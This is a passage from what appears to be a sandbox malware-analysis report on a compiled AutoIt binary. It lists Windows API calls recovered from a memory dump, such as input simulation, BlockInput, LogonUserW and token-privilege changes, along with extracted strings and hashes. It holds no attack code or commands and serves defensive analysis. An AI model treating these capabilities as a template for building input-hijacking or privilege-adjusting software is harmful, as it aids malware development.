                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002D1B01
                                                                            • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 002D1B14
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            • Opcode ID: 6881924a06c31f63a7585af24341c7524628b6cff3b55870eb9d619f102789e7
                                                                            • Instruction ID: 933ad784b8db9b6cfbd160071774896904e12870c0c45d48d376b8bc4602902d
                                                                            • Opcode Fuzzy Hash: 6881924a06c31f63a7585af24341c7524628b6cff3b55870eb9d619f102789e7
                                                                            • Instruction Fuzzy Hash: F9F0A93190024DABDB04CF90C805BFE7BB8FF04305F00800BF94596292D3798A21DF94
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,002E9B52,?,0030098C,?), ref: 002DA6DA
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,002E9B52,?,0030098C,?), ref: 002DA6EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 0030d8f36bab7f24a7c641ec082ee9816dcb6d1606d883520378f8c779ba9341
                                                                            • Instruction ID: ef587a2229bed34b37fc9683aca49a4d667b4697d298346e13076fc3c54a6b9f
                                                                            • Opcode Fuzzy Hash: 0030d8f36bab7f24a7c641ec082ee9816dcb6d1606d883520378f8c779ba9341
                                                                            • Instruction Fuzzy Hash: 2AF0893551521EFBDB21AFA4CC48FDA776CAF09761F008156B50896181D670DA50CFE1
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C8F27), ref: 002C8DFE
                                                                            • CloseHandle.KERNEL32(?,?,002C8F27), ref: 002C8E10
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 9666c56728512fccc471014fe3d4eeb3fe6c35af3748e7e80ad0ed203e2f2d0d
                                                                            • Instruction ID: 2c7c93e220d96f3749a678059b64a959f04299c6e915ffe4b38806d650d88d3d
                                                                            • Opcode Fuzzy Hash: 9666c56728512fccc471014fe3d4eeb3fe6c35af3748e7e80ad0ed203e2f2d0d
                                                                            • Instruction Fuzzy Hash: 45E0BF75011611EFEB262B61EC19E7777ADEB04311B14891DF86580470DB725CA0DB50
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00298F87,?,?,?,00000001), ref: 0029A38A
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0029A393
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 17334299676b01861d356d051c0b44218a8007a99eddd11ef3102eec4a9c3a00
                                                                            • Instruction ID: 9b124ad27cb5d86aac130b35e67f78f89859d744ade547f56899a4f2fed8f8e1
                                                                            • Opcode Fuzzy Hash: 17334299676b01861d356d051c0b44218a8007a99eddd11ef3102eec4a9c3a00
                                                                            • Instruction Fuzzy Hash: F4B09235065208ABCA472B91EC19B883F6CEB45B62F004092F64D44060CB6254508A91
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 002E45F0
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: f1376e34d7e85fdbcd2e0c49ec33e0587b332e1becfbf8017fcc0cc0373017e7
                                                                            • Instruction ID: ec721a0e9c31d92671d7d5f0fe37342c222de18699a07d54b0f4f661ad760e3d
                                                                            • Opcode Fuzzy Hash: f1376e34d7e85fdbcd2e0c49ec33e0587b332e1becfbf8017fcc0cc0373017e7
                                                                            • Instruction Fuzzy Hash: C6E09A312202199FC310BF5AE800A9AF7E8EFA8760F008016F849D7310DAB0A9108B90
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002D5205
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: cc59aab34f554b1664a4488b9ef3ce0bbbfbb49cf5472193365a6334c0cfc2fb
                                                                            • Instruction ID: ce44b320f3911266854c4f7526b45908646ba53db43320390a0f125d083b0315
                                                                            • Opcode Fuzzy Hash: cc59aab34f554b1664a4488b9ef3ce0bbbfbb49cf5472193365a6334c0cfc2fb
                                                                            • Instruction Fuzzy Hash: 3AD092A6174E2A79ED580B249E1FF761608E3027C1F94868B714A892C2ECD4ECA5A831
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002C8FA7), ref: 002C9389
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: bd09888f822963a6866cce67908cf90f794a08ae657562497dcbe58c831b3727
                                                                            • Instruction ID: f006a76aab62bd96e72e8a6e3f1739985abb7c7807602977764aecaea121bc90
                                                                            • Opcode Fuzzy Hash: bd09888f822963a6866cce67908cf90f794a08ae657562497dcbe58c831b3727
                                                                            • Instruction Fuzzy Hash: A7D05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A0C775D835AB60
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 002B0734
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: cadb00760fe7f573653db9684b8f47da1f1a671a0fbf7ee3951caa977e2c0c8c
                                                                            • Instruction ID: f580a8b916f58ec2bd3ca9c8e39aa066031487c4c6697cf57577fe29898f7179
                                                                            • Opcode Fuzzy Hash: cadb00760fe7f573653db9684b8f47da1f1a671a0fbf7ee3951caa977e2c0c8c
                                                                            • Instruction Fuzzy Hash: 47C04CF1C11109DBDB06DBA0D998EEF77BCAB04304F104456A105B2100D7749B448A71
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0029A35A
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 29ea7053f1321c4c3850cd479c6f846b137076d78b4eb396f3d518e57777407b
                                                                            • Instruction ID: d68037f6d30d89c83467db2fd42488d92637b21dfe2f33aacf9d2aa86be2a463
                                                                            • Opcode Fuzzy Hash: 29ea7053f1321c4c3850cd479c6f846b137076d78b4eb396f3d518e57777407b
                                                                            • Instruction Fuzzy Hash: D6A0223002020CFBCF032F82FC08888BFACEB003A0F0080A2F80C00032CB33A8208AC0
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,00300980), ref: 002F3C65
                                                                            • IsWindowVisible.USER32(?), ref: 002F3C89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 4105515805-45149045
                                                                            • Opcode ID: a00bf187262f09c5ba352bb9a1fb86a3fdd59d7a6ad557265c6fe74d8daf01b9
                                                                            • Instruction ID: 02f91e022f38bb10da74886d6e1bc73e4dd51a1ce05ea8b034f587bcda806630
                                                                            • Opcode Fuzzy Hash: a00bf187262f09c5ba352bb9a1fb86a3fdd59d7a6ad557265c6fe74d8daf01b9
                                                                            • Instruction Fuzzy Hash: CFD15F34234219CBCB19EF10C451A7EB7A5EF94384F104568FA855B2A2CB71EE6ACF91
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 002FAC55
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 002FAC86
                                                                            • GetSysColor.USER32(0000000F), ref: 002FAC92
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 002FACAC
                                                                            • SelectObject.GDI32(?,?), ref: 002FACBB
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 002FACE6
                                                                            • GetSysColor.USER32(00000010), ref: 002FACEE
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 002FACF5
                                                                            • FrameRect.USER32(?,?,00000000), ref: 002FAD04
                                                                            • DeleteObject.GDI32(00000000), ref: 002FAD0B
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 002FAD56
                                                                            • FillRect.USER32(?,?,?), ref: 002FAD88
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002FADB3
                                                                              • Part of subcall function 002FAF18: GetSysColor.USER32(00000012), ref: 002FAF51
                                                                              • Part of subcall function 002FAF18: SetTextColor.GDI32(?,?), ref: 002FAF55
                                                                              • Part of subcall function 002FAF18: GetSysColorBrush.USER32(0000000F), ref: 002FAF6B
                                                                              • Part of subcall function 002FAF18: GetSysColor.USER32(0000000F), ref: 002FAF76
                                                                              • Part of subcall function 002FAF18: GetSysColor.USER32(00000011), ref: 002FAF93
                                                                              • Part of subcall function 002FAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002FAFA1
                                                                              • Part of subcall function 002FAF18: SelectObject.GDI32(?,00000000), ref: 002FAFB2
                                                                              • Part of subcall function 002FAF18: SetBkColor.GDI32(?,00000000), ref: 002FAFBB
                                                                              • Part of subcall function 002FAF18: SelectObject.GDI32(?,?), ref: 002FAFC8
                                                                              • Part of subcall function 002FAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 002FAFE7
                                                                              • Part of subcall function 002FAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002FAFFE
                                                                              • Part of subcall function 002FAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 002FB013
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            • Opcode ID: e9d7f83a9dd13c462153b41b503dcd0421472a3fca6c7712fffd97efae175ee2
                                                                            • Instruction ID: 932e44afc586c56efe6b64cab8331d34b988f8eed8b0fa08953b8c6a368b0a8f
                                                                            • Opcode Fuzzy Hash: e9d7f83a9dd13c462153b41b503dcd0421472a3fca6c7712fffd97efae175ee2
                                                                            • Instruction Fuzzy Hash: E5A1D0B1019305AFD7169F64DC08F6BBBA9FF89321F100A2AF666961E0C770D850CF52
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?), ref: 00273072
                                                                            • DeleteObject.GDI32(00000000), ref: 002730B8
                                                                            • DeleteObject.GDI32(00000000), ref: 002730C3
                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 002730CE
                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 002730D9
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 002AC77C
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002AC7B5
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002ACBDE
                                                                              • Part of subcall function 00271F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00272412,?,00000000,?,?,?,?,00271AA7,00000000,?), ref: 00271F76
                                                                            • SendMessageW.USER32(?,00001053), ref: 002ACC1B
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002ACC32
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002ACC48
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002ACC53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 464785882-4108050209
                                                                            • Opcode ID: d8000a5d25fd67c7bef591ca34b6a73f49cdf28082779078476f78a2792cd167
                                                                            • Instruction ID: 16c64d19e147bd743dca513aca194da4926c33cebf5232134e4eaaf9bec08faa
                                                                            • Opcode Fuzzy Hash: d8000a5d25fd67c7bef591ca34b6a73f49cdf28082779078476f78a2792cd167
                                                                            • Instruction Fuzzy Hash: C9129F30624202EFDB25CF24C894BA5B7A5FF06310F24856AE599CB262CB31ED65DF91
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 2660009612-1645009161
                                                                            • Opcode ID: 698fed91e4c44182dba59d773f43ea9d4b2ab8fbaaf5f7f5484b42784f1fa3cd
                                                                            • Instruction ID: fd9c2071197f4206a4697bb545860827da0578284561b2e33d894860e9a91ba2
                                                                            • Opcode Fuzzy Hash: 698fed91e4c44182dba59d773f43ea9d4b2ab8fbaaf5f7f5484b42784f1fa3cd
                                                                            • Instruction Fuzzy Hash: D4A1A234A2120AEBDF15FF21DD52EAE7BA8AF04740F144029FC05A62D2DB719E75DB60
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 002E7BC8
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002E7C87
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002E7CC5
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002E7CD7
                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002E7D1D
                                                                            • GetClientRect.USER32(00000000,?), ref: 002E7D29
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002E7D6D
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002E7D7C
                                                                            • GetStockObject.GDI32(00000011), ref: 002E7D8C
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002E7D90
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002E7DA0
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E7DA9
                                                                            • DeleteDC.GDI32(00000000), ref: 002E7DB2
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002E7DDE
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 002E7DF5
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002E7E30
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002E7E44
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 002E7E55
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002E7E85
                                                                            • GetStockObject.GDI32(00000011), ref: 002E7E90
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002E7E9B
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002E7EA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 8208048c8435444d5625b616d7c668fc0fe49d41da34143f71660bdfc1241dba
                                                                            • Instruction ID: 92353120d4652d65d725f9918c0adc55504cc4f74754967e385284c44050259a
                                                                            • Opcode Fuzzy Hash: 8208048c8435444d5625b616d7c668fc0fe49d41da34143f71660bdfc1241dba
                                                                            • Instruction Fuzzy Hash: 85A160B1A51219BFEB15DB64DC8AFAB7BADEB09710F008115FA15E72E0C770AD10CB60
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 002DB361
                                                                            • GetDriveTypeW.KERNEL32(?,00302C4C,?,\\.\,00300980), ref: 002DB43E
                                                                            • SetErrorMode.KERNEL32(00000000,00302C4C,?,\\.\,00300980), ref: 002DB59C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 57bcfabb575ab33200bfea398202a607fd5528976154bdb6421fa96eaf5ffc78
                                                                            • Instruction ID: f923b31673c86fb3b1c2772008a4aa5ad1af63dcc19e72d79517c048ff03f9c0
                                                                            • Opcode Fuzzy Hash: 57bcfabb575ab33200bfea398202a607fd5528976154bdb6421fa96eaf5ffc78
                                                                            • Instruction Fuzzy Hash: F151F830B70209EBCB12EF24E962ABCB7A0AF44740B65411BF406A77D1D7B1AE71DB51
                                                                            APIs
